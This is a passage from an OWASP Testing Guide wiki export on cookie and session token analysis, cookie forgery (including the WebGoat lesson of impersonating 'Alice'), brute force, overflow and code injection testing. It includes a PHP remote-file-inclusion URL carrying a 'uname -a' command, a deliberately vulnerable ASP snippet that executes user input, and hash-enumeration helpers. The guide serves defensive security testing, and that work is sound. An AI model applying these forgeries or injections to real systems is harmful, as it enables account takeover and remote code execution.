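    "31bbf9ee87966bbs",
]

def column_values(cookies):
    return [set(c[i] for c in cookies) for i in range(len(cookies[0]))]

cols = column_values(samples)
# cols[9] contains only "7" (the constant column), and every value in
# cols[0] is an odd digit, matching the observations in the text.
```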
&lt;br /&gt;
* Does the cookie name provide some hints about the nature of data it stores? As hinted before, a cookie named “IsAdmin” would be a great target to play with&lt;br /&gt;
* Does the cookie (or its parts) seem to be encoded/encrypted? A 16-byte pseudo-random value could be a sign of an MD5 hash. A 20-byte value could indicate a SHA-1 hash. A string of seemingly random alphanumeric characters could actually hide a base64 encoding that can be easily reversed using WebScarab or even a simple Perl script. A cookie whose value is “YWRtaW46WW91V29udEd1ZXNzTWU=” would translate into a more friendly “admin:YouWontGuessMe”. Another option is that the value has been obfuscated, for example by XORing it with some string.&lt;br /&gt;
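Checking for base64 is a one-liner; here applied to the value quoted above:&lt;br /&gt;

```python
import base64

# The seemingly random cookie value from the text is plain base64.
value = "YWRtaW46WW91V29udEd1ZXNzTWU="
decoded = base64.b64decode(value).decode()
# decoded == "admin:YouWontGuessMe"
```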
* What data is included in the cookie? Examples of data that can be stored in the cookie include: username, password, timestamp, role (e.g.: user, admin,...), and source IP address. It is important at this stage to distinguish which pieces of information have a deterministic value and which have a random nature.&lt;br /&gt;
* If the cookie contains information about the source IP address, is a corresponding check enforced server-side? What happens when, inside the same session, we change the IP address from which we contact the server? Is the request rejected?&lt;br /&gt;
* Does the cookie contain information about the application workflow? A cookie named “FailedLoginAttempts” could trigger an account lockout. Being able to keep its value at zero could allow a brute-force attack against one or more accounts.&lt;br /&gt;
* In the case of numeric values, what are their boundaries? In the previous example, CR can probably hold a very limited set of values, while TM and LM use a much broader space. Can a field contain a negative number? If not, what happens when forcing a negative number into it? Is it possible to guess how many bytes are allocated for the value? If a cookie seems to assume values between 0 and 65535 only, then it is probably stored in an unsigned 2-byte variable. What happens when trying to overflow it? If the cookie holds a string, how long can it be?&lt;br /&gt;
* If we start multiple separate sessions, how do the delivered cookies change? Let's say that we login 5 times in a row and we receive the following cookies:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
id=7612542756:cnt=a5c8:grp=0&lt;br /&gt;
id=7612542756:cnt=a5c9:grp=0&lt;br /&gt;
id=7612542756:cnt=a5ca:grp=0&lt;br /&gt;
id=7612542756:cnt=a5cb:grp=0&lt;br /&gt;
id=7612542756:cnt=a5cd:grp=0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* As we can see, we have two constant fields (“id” and “grp”) that probably identify us, so these parts are unlikely to change in future attempts. A third field (“cnt”) changes, however, and looks like a hexadecimal 2-byte counter. Between the 4th and the 5th cookies we see that we have missed a value, meaning that someone else probably logged in in the meantime.&lt;br /&gt;
* Does the cookie have an expiration time? Is it enforced server-side? (To check this, you can simply modify the set-cookie directive on the fly to indicate a much longer validity period and see whether the server respects it.) Enforcement of expiration times is extremely important as a defence against replay attacks.&lt;br /&gt;
&lt;br /&gt;
If the cookie has authentication purposes, it is better to have at least 2 different users in order to check how the cookie varies when belonging to different accounts.&lt;br /&gt;
Sometimes, a cookie generation algorithm uses only deterministic values. Once we understand the algorithm logic, we can easily forge a valid cookie. But sometimes things get more complex, and a cookie (or parts of it) is generated by algorithms that do not let us easily forge valid cookies with a single attempt. For instance, a cookie might include a pseudo-random value. Another example is the use of encryption or hashing functions. Let's have a look at the following 5 cookies:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
1: c75918d4144fc122975590ffa48627c3b1f01bb1&lt;br /&gt;
2: 9ec985ef773e19bab8b43e8ad7b6b4d322b5e50d&lt;br /&gt;
3: d49e0a658b323c4d7ee888275225b4381b70475c&lt;br /&gt;
4: 9ddc4dc3900890cf9c22c7b82fa3143a56b17cf6&lt;br /&gt;
5: fb000aa881948bffbcc01a94a13165fece3349c2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Is there any easy-to-spot generation algorithm? Except for the fact that they are all 20 bytes long, there is not much to be said. But they happen to be the SHA-1 hashes of the five cookies of the previous example, which varied only by a 2-byte counter. Therefore, they can assume only 65536 (2^16) different values, which is not a tiny number, but still a lot less than the 2^160 possible values of a SHA-1 hash. More precisely, we have reduced the cookie space by a factor of 2.23e+43 (2^144).&lt;br /&gt;
&lt;br /&gt;
The only way to spot this behavior would be to collect enough cookies - a simple Perl script would be enough for the task. WebScarab and Cookie Digger also provide very efficient and flexible cookie collection and analysis tools.&lt;br /&gt;
Once we know that this cookie can assume only a very limited set of values, we know that an impersonation attack against an active user has a much higher chance of succeeding than it would otherwise appear. We only have to change the user id and generate the 65536 corresponding possible hashed cookies.&lt;br /&gt;
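A sketch of that enumeration, assuming (for illustration, following the earlier example) that the hash input is the plaintext cookie with the id/cnt/grp template; the template string and function name are ours:&lt;br /&gt;

```python
import hashlib

def candidate_hashes(user_id="7612542756", grp="0"):
    """Enumerate the SHA-1 digests of every possible 2-byte counter value
    for an assumed cookie template id=...:cnt=XXXX:grp=...."""
    cands = set()
    for cnt in range(65536):
        plain = "id=%s:cnt=%04x:grp=%s" % (user_id, cnt, grp)
        cands.add(hashlib.sha1(plain.encode()).hexdigest())
    return cands

# The whole candidate space is only 65536 digests, trivially precomputable.
```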
&lt;br /&gt;
In general, a seemingly random cookie can be less random than it seems, and collecting a high number of cookies can provide valuable information about which values are more likely to be used, revealing hidden properties that could make guessing a valid cookie a viable attack.&lt;br /&gt;
&lt;br /&gt;
The number of cookies that are needed to perform such an analysis depends on a number of factors:&lt;br /&gt;
* Algorithm resistance to pattern discovery&lt;br /&gt;
* Computing resources that are available for the analysis&lt;br /&gt;
* Time needed to collect a single cookie&lt;br /&gt;
&lt;br /&gt;
Once enough samples have been collected, it's time to look for patterns. For example, some characters might be more frequent than others, and another Perl script may be enough to discover that.&lt;br /&gt;
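A character-frequency count is enough for a first look; sketched here over the five “cnt” values collected earlier:&lt;br /&gt;

```python
from collections import Counter

def char_frequencies(cookies):
    """Count how often each character appears across all samples; a
    skewed distribution hints at structure in a supposedly random value."""
    return Counter("".join(cookies))

freq = char_frequencies(["a5c8", "a5c9", "a5ca", "a5cb", "a5cd"])
```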
&lt;br /&gt;
There are some statistical methods that can help in finding patterns in apparently random numbers. A detailed discussion of these methods is outside the scope of this guide, but a few approaches are the following:&lt;br /&gt;
* Strange Attractors and TCP/IP Sequence Number Analysis &amp;lt;u&amp;gt;http://www.bindview.com/Services/Razor/Papers/2001/tcpseq.cfm&amp;lt;/u&amp;gt;&lt;br /&gt;
* Correlation Coefficient - &amp;lt;u&amp;gt;http://mathworld.wolfram.com/CorrelationCoefficient.html&amp;lt;/u&amp;gt;&lt;br /&gt;
* ENT - &amp;lt;u&amp;gt;http://fourmilab.ch/random/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If the cookie seems to have some kind of time dependency, a good approach is to collect a large amount of samples in a short time in order to see whether it is possible to reduce (or eliminate) the time impact when guessing “nearby” cookies.&lt;br /&gt;
&lt;br /&gt;
'''Cookie manipulation'''&lt;br /&gt;
----&lt;br /&gt;
Once you have squeezed out as much information as possible from the cookie, it is time to start modifying it. The methodologies here depend heavily on the results of the analysis phase, but we can provide some examples:&lt;br /&gt;
&lt;br /&gt;
'''Example 1: Cookie with identity in clear text'''&lt;br /&gt;
&lt;br /&gt;
In figure 1, we show an example of cookie manipulation in an application that allows subscribers of a mobile telecom operator to send MMS messages via the Internet. Surfing the application using OWASP WebScarab or Burp Proxy, we can see that after the authentication process the cookie ''msidnOneShot'' contains the sender's telephone number. This cookie is used to identify the user for the service payment process. However, the phone number is stored in the clear and is not protected in any way. Thus, if we modify the cookie from ''msidnOneShot=3*******59'' to&lt;br /&gt;
''msidnOneShot=3*******99'', the mobile user who owns the number 3*******99 will pay for the MMS message!&lt;br /&gt;
&lt;br /&gt;
[[Image:Example of Cookie with identity in clear text.gif]]&lt;br /&gt;
 &lt;br /&gt;
Figure 1 - Example of Cookie with identity in clear text&lt;br /&gt;
&lt;br /&gt;
Source: A Case Study of a Web Application Vulnerability - Matteo Meucci: http://www.owasp.org/docroot/owasp/misc/OWASP-Italy-MMS-Spoofing.zip&lt;br /&gt;
&lt;br /&gt;
'''Example 2: guessable cookie '''&lt;br /&gt;
&lt;br /&gt;
An example of a cookie whose value is easy to guess, and that can be used to impersonate other users, can be found in OWASP WebGoat, in the “Weak Authentication cookie” lesson. In this example, you start with the knowledge of two username/password pairs (corresponding to the users 'webgoat' and 'aspect'). The goal is to reverse engineer the cookie creation logic and break into the account of the user 'Alice'. &lt;br /&gt;
By authenticating to the application using these known pairs, you can collect the corresponding authentication cookies. In table 1 you can find the associations that bind each username/password pair to its cookie, together with the exact login time.&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
 || '''Username''' || '''Password''' || '''Authentication Cookie - Time'''&lt;br /&gt;
|-&lt;br /&gt;
 || webgoat || Webgoat || 65432ubphcfx – 10/7/2005-10:10&lt;br /&gt;
65432ubphcfx – 10/7/2005-10:11&lt;br /&gt;
|-&lt;br /&gt;
 || aspect || Aspect || 65432udfqtb – 10/7/2005-10:12&lt;br /&gt;
65432udfqtb – 10/7/2005-10:13&lt;br /&gt;
|-&lt;br /&gt;
 || Alice || ????? || ???????????&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table 1: Cookie collections &lt;br /&gt;
&lt;br /&gt;
First of all, we can note that the authentication cookie remains constant for the same user across different logons, revealing a first critical vulnerability to replay attacks: if we are able to steal a valid cookie (using, for example, an XSS vulnerability), we can use it to hijack the session of the corresponding user without knowing his/her credentials.&lt;br /&gt;
Additionally, we note that the “webgoat” and “aspect” cookies have a common part:&lt;br /&gt;
“65432u”. “65432” seems to be a constant integer. What about “u” ? The strings “webgoat” and “aspect” both end with the “t” letter, and “u” is the letter following it.&lt;br /&gt;
So let's see the letter following each letter in “webgoat”:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
1st char: “w” + 1 =“x”&lt;br /&gt;
2nd char: “e” + 1 = “f”&lt;br /&gt;
3rd char: “b” + 1 = “c”&lt;br /&gt;
4th char: “g” + 1= “h”&lt;br /&gt;
5th char: “o” + 1= “p”&lt;br /&gt;
6th char: “a” + 1= “b”&lt;br /&gt;
7th char: “t” + 1 = “u”&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We obtain “xfchpbu”, which, when reversed, gives us exactly “ubphcfx”. The algorithm also fits perfectly for the user 'aspect', so we only have to apply it to the user 'Alice', whose cookie works out to be “65432fdjmb”. We authenticate to the application again with the “webgoat” credentials, substitute the received cookie with the one we have just calculated for Alice and… Bingo! The application now identifies us as “Alice” instead of “webgoat”.&lt;br /&gt;
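The reverse-engineered scheme above can be sketched in a few lines. This is a hypothetical reconstruction in Python; the function name is ours, and lowercasing the username is an assumption inferred from the 'Alice' cookie:

```python
def webgoat_cookie(username):
    # Hypothetical reconstruction of the lesson's cookie scheme:
    # shift each letter of the (lowercased) username forward by one,
    # reverse the result, and prepend the constant "65432".
    shifted = "".join(chr(ord(ch) + 1) for ch in username.lower())
    return "65432" + shifted[::-1]
```

Applying it to 'webgoat' and 'aspect' reproduces the cookies in Table 1, and applying it to 'Alice' yields the cookie used in the attack.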
&lt;br /&gt;
'''Brute force'''&lt;br /&gt;
----&lt;br /&gt;
The use of a brute force attack to find the right authentication cookie can be a heavy and time-consuming technique. Foundstone CookieDigger can help collect a large number of cookies, reporting their average length and character set. In addition, the tool compares the different values of the cookie to check how many characters change on each subsequent login. If the cookie values do not remain the same on subsequent logins, CookieDigger gives the attacker longer periods of time to perform brute force attempts.&lt;br /&gt;
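The kind of summary CookieDigger produces can be approximated by hand. A rough sketch in Python (the function and its return values are ours, not CookieDigger's):

```python
def summarize_cookies(cookies):
    # Average length, observed character set, and the character positions
    # whose value changes across the sample (the part worth brute forcing).
    avg_len = sum(len(c) for c in cookies) / len(cookies)
    charset = "".join(sorted(set("".join(cookies))))
    min_len = min(len(c) for c in cookies)
    varying = [i for i in range(min_len) if len({c[i] for c in cookies}) > 1]
    return avg_len, charset, varying
```

Run over the WebGoat cookies above, for example, it flags only the tail positions as variable.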
In the following table, we show an example in which we have collected all the cookies from a public site, making 10 authentication attempts. For each type of cookie collected, you have an estimate of the number of attempts needed to “brute force” the cookie. &lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
 || '''Cookie predictability''' &lt;br /&gt;
|-&lt;br /&gt;
 ||CookieName ||X_ID ||COOKIE_IDENT_SERV ||X_ID_YACAS ||COOKIE_IDENT ||X_UPC ||CAS_UPC ||CAS_SCC ||COOKIE_X ||vgnvisitor&lt;br /&gt;
|-&lt;br /&gt;
 ||Predictability Index &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
{| border=1&lt;br /&gt;
 ||'''High''' &lt;br /&gt;
|-&lt;br /&gt;
 ||'''335697***''' &lt;br /&gt;
|-&lt;br /&gt;
 ||'''CookieName''' ||'''Has Username or Password''' ||'''Average Length''' ||'''Character Set''' ||'''Randomness Index''' ||'''Brute Force Attempts''' &lt;br /&gt;
|-&lt;br /&gt;
 ||X_ID ||False ||820 ||, 0-9, a-f ||52,43 ||2,60699329187639E+129 &lt;br /&gt;
|-&lt;br /&gt;
 ||COOKIE_IDENT_SERV ||False ||54 ||, +, /-9, A-N, P-X, Z, a-z ||31,19 ||12809303223894,6 &lt;br /&gt;
|-&lt;br /&gt;
 ||X_ID_YACAS ||False ||820 ||, 0-9, a-f ||52,52 ||4,46965862559887E+129 &lt;br /&gt;
|-&lt;br /&gt;
 ||COOKIE_IDENT ||False ||54 ||, +, /-9, A-N, P-X, Z, a-z ||31,19 ||12809303223894,6 &lt;br /&gt;
|-&lt;br /&gt;
 ||X_UPC ||False ||172 ||, 0-9, a-f ||23,95 ||2526014396252,81 &lt;br /&gt;
|-&lt;br /&gt;
 ||CAS_UPC ||False ||172 ||, 0-9, a-f ||23,95 ||2526014396252,81 &lt;br /&gt;
|-&lt;br /&gt;
 ||CAS_SCC ||False ||152 ||, 0-9, a-f ||34,65 ||7,14901878613151E+15 &lt;br /&gt;
|-&lt;br /&gt;
 ||COOKIE_X ||False ||32 ||, +, /, 0, 8, 9, A, C, E, K, M, O, Q, R, W-Y, e-h, l, m, q, s, u, y, z ||0 ||1 &lt;br /&gt;
|-&lt;br /&gt;
 ||vgnvisitor ||False ||26 ||, 0-2, 5, 7, A, D, F-I, K-M, O-Q, W-Y, a-h, j-q, t, u, w-y, ~ ||33,59 ||18672264717,3479 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
{|border=1&lt;br /&gt;
 ||X_ID &lt;br /&gt;
|-&lt;br /&gt;
||5573657249643a3d333335363937393835323b4d736973646e3a3d333335363937393835323b537461746f436f6e73656e736f3a3d303b4d65746f646f417574656e746963…………..0525147746d6e673d3d &lt;br /&gt;
|-&lt;br /&gt;
||5573657249643a3d333335363937393835323b4d736973646e3a3d333335363937393835323b537461746f436f6e73656e736f3a3d303b4d65746f646f417574656e746963617a696f6e6…..354730632f5346673d3d &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''Table 2: An example of CookieDigger report'''&lt;br /&gt;
&lt;br /&gt;
'''Overflow'''&lt;br /&gt;
----&lt;br /&gt;
Since the cookie value, when received by the server, will be stored in one or more variables, there is always the chance of performing a boundary violation of that variable. Overflowing a cookie can lead to all the outcomes of buffer overflow attacks. A Denial of Service is usually the easiest goal, but the execution of remote code can also be possible. However, this usually requires some detailed knowledge about the architecture of the remote system, as any buffer overflow technique is heavily dependent on the underlying operating system and memory management in order to correctly calculate offsets to properly craft and align inserted code.&lt;br /&gt;
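A first probe for this class of flaw is simply an oversized cookie. A minimal sketch, assuming a hypothetical cookie name; the length would be varied across attempts:

```python
def oversized_cookie_header(name="SESSIONID", length=5000):
    # Build a Cookie header whose value is far larger than any sane
    # session token, to probe server-side buffer handling.
    return "Cookie: {}={}".format(name, "A" * length)
```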
&lt;br /&gt;
Example: &amp;lt;u&amp;gt;http://seclists.org/lists/fulldisclosure/2005/Jun/0188.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* RFC 2965 “HTTP State Management Mechanism”&lt;br /&gt;
* RFC 1750 “Randomness Recommendations for Security”&lt;br /&gt;
* “Strange Attractors and TCP/IP Sequence Number Analysis”: http://www.bindview.com/Services/Razor/Papers/2001/tcpseq.cfm&lt;br /&gt;
* Correlation Coefficient: http://mathworld.wolfram.com/CorrelationCoefficient.html&lt;br /&gt;
* ENT: http://fourmilab.ch/random/&lt;br /&gt;
* http://seclists.org/lists/fulldisclosure/2005/Jun/0188.html&lt;br /&gt;
* Darrin Barrall: &amp;quot;Automated Cookie Analisys&amp;quot; –  http://www.spidynamics.com/assets/documents/SPIcookies.pdf&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* [[:Category:OWASP WebScarab Project|OWASP's WebScarab]] features a session token analysis mechanism. You can read [[How to test session identifier strength with WebScarab]].&lt;br /&gt;
* Foundstone CookieDigger - http://www.foundstone.com/resources/proddesc/cookiedigger.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Code_Injection_(OTG-INPVAL-012)&amp;diff=14680</id>
		<title>Testing for Code Injection (OTG-INPVAL-012)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Code_Injection_(OTG-INPVAL-012)&amp;diff=14680"/>
				<updated>2006-12-29T20:03:06Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
 &lt;br /&gt;
This section describes how a tester can check if it is possible to enter code as input on a web page and have it executed by the web server. More information about Code Injection here: http://www.owasp.org/index.php/Code_Injection&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue ==&lt;br /&gt;
 &lt;br /&gt;
Code Injection testing involves a tester submitting code as input that is processed by the web server as dynamic code or as an included file.  These tests can target various server-side scripting engines, i.e. ASP, PHP, etc.  Proper validation and secure coding practices need to be employed to protect against these attacks.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
 &lt;br /&gt;
'''Testing for PHP Injection vulnerabilities:'''&lt;br /&gt;
&lt;br /&gt;
Using the querystring, the tester can inject code (in this example, a malicious url) to be processed as part of the included file:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&amp;amp;cmd=uname%20-a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Result Expected:'''&lt;br /&gt;
&lt;br /&gt;
The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file.&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
'''Testing for ASP Code Injection vulnerabilities'''&lt;br /&gt;
&lt;br /&gt;
Examine ASP code for user input used in execution functions. For example, can the user enter commands into the Data input field? Here, the ASP code saves the input to a file and then executes it:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;%&lt;br /&gt;
 If not isEmpty(Request( &amp;quot;Data&amp;quot; ) ) Then&lt;br /&gt;
 Dim fso, f&lt;br /&gt;
 'User input Data is written to a file named data.txt&lt;br /&gt;
 Set fso = CreateObject(&amp;quot;Scripting.FileSystemObject&amp;quot;)&lt;br /&gt;
 Set f = fso.OpenTextFile(Server.MapPath( &amp;quot;data.txt&amp;quot; ), 8, True)&lt;br /&gt;
 f.Write Request(&amp;quot;Data&amp;quot;) &amp;amp; vbCrLf&lt;br /&gt;
 f.close&lt;br /&gt;
 Set f = nothing&lt;br /&gt;
 Set fso = Nothing&lt;br /&gt;
&lt;br /&gt;
 'Data.txt is executed&lt;br /&gt;
 Server.Execute( &amp;quot;data.txt&amp;quot; )&lt;br /&gt;
&lt;br /&gt;
 Else&lt;br /&gt;
 %&amp;gt;&lt;br /&gt;
 &amp;lt;form&amp;gt;&lt;br /&gt;
 &amp;lt;input name=&amp;quot;Data&amp;quot; /&amp;gt;&amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Enter Data&amp;quot; /&amp;gt;&lt;br /&gt;
 &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;%&lt;br /&gt;
 End If&lt;br /&gt;
 %&amp;gt;&lt;br /&gt;
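The save-then-execute pattern above is not specific to ASP. For illustration only, the same vulnerability reproduced in Python (the file name mirrors the ASP example; `exec` plays the role of `Server.Execute`):

```python
def handle_request(data):
    # VULNERABLE: user input is written to a file and then executed
    # as code, mirroring the ASP example above.
    with open("data.txt", "w") as f:
        f.write(data + "\n")
    ns = {}
    with open("data.txt") as f:
        exec(f.read(), ns)  # attacker-controlled code runs server-side
    return ns
```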
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* Security Focus - http://www.securityfocus.com&lt;br /&gt;
&lt;br /&gt;
* Insecure.org - http://www.insecure.org&lt;br /&gt;
&lt;br /&gt;
* Wikipedia - http://www.wikipedia.org&lt;br /&gt;
&lt;br /&gt;
* OWASP Code Review - http://www.owasp.org/index.php/OS_Injection&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Session_Management_Schema_(OTG-SESS-001)&amp;diff=14485</id>
		<title>Testing for Session Management Schema (OTG-SESS-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Session_Management_Schema_(OTG-SESS-001)&amp;diff=14485"/>
				<updated>2006-12-18T22:12:04Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
In order to avoid continuous authentication for each page of a website or service, web applications implement various mechanisms to store and validate credentials for a pre-determined timespan.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
These mechanisms are known as Session Management and, while they are important for the ease of use and user-friendliness of the application, they can be exploited by a pentester to gain access to a user account without the need to provide correct credentials.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
The session management schema should be considered alongside the authentication and authorization schema, and cover at least the questions below from a non-technical point of view:&lt;br /&gt;
* Will the application be accessed from shared systems? e.g. Internet Café	 &amp;lt;br&amp;gt;&lt;br /&gt;
* Is application security of prime concern to the visiting client/customer?	&amp;lt;br&amp;gt;&lt;br /&gt;
* How many concurrent sessions may a user have?	&amp;lt;br&amp;gt;&lt;br /&gt;
* How long is the inactive timeout on the application?&amp;lt;br&amp;gt;	&lt;br /&gt;
* How long is the active timeout?	&amp;lt;br&amp;gt;&lt;br /&gt;
* Are sessions transferable from one source IP to another?	&amp;lt;br&amp;gt;&lt;br /&gt;
* Is ‘remember my username’ functionality provided?	&amp;lt;br&amp;gt;&lt;br /&gt;
* Is ‘automatic login’ functionality provided?	&amp;lt;br&amp;gt;&lt;br /&gt;
Having identified the schema in place, the application and its logic must be examined to ensure the proper implementation of the schema.&lt;br /&gt;
This phase of testing is intrinsically linked with general application security testing.  Whilst the first Schema questions (is the schema suitable for the site and does the schema meet the application provider’s requirements?) can be analysed in abstract, the final question (does the site implement the specified schema?) must be considered alongside other technical testing. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The identified schema should be analyzed against best practice within the context of the site during our penetration test.&lt;br /&gt;
Where the defined schema deviates from security best practice, the associated risks should be identified and described within the context of the environment.  Security risks and issues should be detailed and quantified, but ultimately the application provider must make decisions based on the security and usability of the application.&lt;br /&gt;
For example, if it is determined that the site has been designed without inactive session timeouts, the application provider should be advised about risks such as replay attacks, long-term attacks based on stolen or compromised Session IDs, and abuse of a shared terminal where the application was not logged out.  They must then consider these against other requirements such as convenience of use for clients and disruption of the application by forced re-authentication.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
''' Session Management Implementation'''&amp;lt;br&amp;gt;&lt;br /&gt;
In this Chapter we describe how to analyse a Session Schema and how to test it. Technical security testing of Session Management implementation covers two key areas:&lt;br /&gt;
* Integrity of Session ID creation&lt;br /&gt;
* Secure management of active sessions and Session IDs&lt;br /&gt;
The Session ID should be sufficiently unpredictable and abstracted from any private information, and the Session management should be logically secured to prevent any manipulation or circumvention of application security.&lt;br /&gt;
These two key areas are interdependent, but should be considered separately for a number of reasons.&lt;br /&gt;
Firstly, the choice of underlying technology to provide the sessions is bewildering and can already include a large number of OTS products and an almost unlimited number of bespoke or proprietary implementations.  Whilst the same technical analysis must be performed on each, established vendor solutions may require a slightly different testing approach, and existing security research may exist on the implementation.&lt;br /&gt;
Secondly, even an unpredictable and abstract Session ID may be rendered completely ineffectual should the Session management be flawed.  Similarly, a strong and secure session management implementation may be undermined by a poor Session ID implementation.&lt;br /&gt;
Furthermore, the analyst should closely examine how (and if) the application uses the available Session management.  It is not uncommon to see Microsoft IIS server ASP Session IDs passed religiously back and forth during interaction with an application, only to discover that these are not used by the application logic at all.  It is therefore not correct to say that because an application is built on a ‘proven secure’ platform its Session Management is automatically secure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
''' Session Analysis'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The Session Tokens (Cookie, SessionID or Hidden Field) themselves should be examined to ensure their quality from a security perspective.  They should be tested against criteria such as their randomness, uniqueness, resistance to statistical and cryptographic analysis and information leakage.&amp;lt;br&amp;gt;&lt;br /&gt;
* Token Structure &amp;amp; Information Leakage&lt;br /&gt;
The first stage is to examine the structure and content of a Session ID provided by the application.  A common mistake is to include specific data in the Token instead of issuing a generic value and referencing real data at the server side.&lt;br /&gt;
If the Session ID is clear-text, the structure and pertinent data may be immediately obvious, as in the following:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
192.168.100.1:owaspuser:password:15:58&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If part or all of the Token appears to be encoded or hashed, it should be compared against various techniques to check for obvious obfuscation.&lt;br /&gt;
For example, the string “192.168.100.1:owaspuser:password:15:58” is shown below represented in Hex, in Base64, and as an MD5 hash:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hex	3139322E3136382E3130302E313A6F77617370757365723A70617373776F72643A31353A3538&lt;br /&gt;
Base64	MTkyLjE2OC4xMDAuMTpvd2FzcHVzZXI6cGFzc3dvcmQ6MTU6NTg=&lt;br /&gt;
MD5	01c2fc4f0a817afd8366689bd29dd40a&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Having identified the type of obfuscation, it may be possible to decode back to the original data.  In most cases, however, this is unlikely.  Even so, it may be useful to enumerate the encoding in place from the format of the message.  Furthermore, if both the format and obfuscation technique can be deduced, automated brute-force attacks could be devised.&lt;br /&gt;
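The comparison described above is easy to script: compute the common encodings of a candidate clear-text value and match them against the captured token. A sketch using only the Python standard library:

```python
import base64
import binascii
import hashlib

token = "192.168.100.1:owaspuser:password:15:58"
hex_form = binascii.hexlify(token.encode()).decode().upper()
b64_form = base64.b64encode(token.encode()).decode()
md5_form = hashlib.md5(token.encode()).hexdigest()
# Each form can now be compared against the captured Session ID.
```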
Hybrid Tokens may include information such as an IP address or User ID together with an encoded portion, as in the following:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
owaspuser:192.168.100.1: a7656fafe94dae72b1e1487670148412&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Having analysed a single Session Token, the representative sample should be examined.&lt;br /&gt;
A simple analysis of the Tokens should immediately reveal any obvious patterns.  For example, a 32 bit Token may include 16 bits of static data and 16 bits of variable data.  This may indicate that the first 16 bits represent a fixed attribute of the user – e.g. the username or IP address.&lt;br /&gt;
If the second 16 bit chunk is incrementing at a regular rate, it may indicate a sequential or even time-based element to the Token generation.  See Examples.&lt;br /&gt;
If static elements to the Tokens are identified, further samples should be gathered, varying one potential input element at a time.  For example, login attempts through a different user account or from a different IP address may yield a variance in the previously static portion of the Session Token.&lt;br /&gt;
The following areas should be addressed during the single and multiple Session ID structure testing:&lt;br /&gt;
* What parts of the Session ID are static?	&lt;br /&gt;
* What clear-text proprietary information is stored in the Session ID?  &lt;br /&gt;
e.g. usernames/UID, IP addresses	&lt;br /&gt;
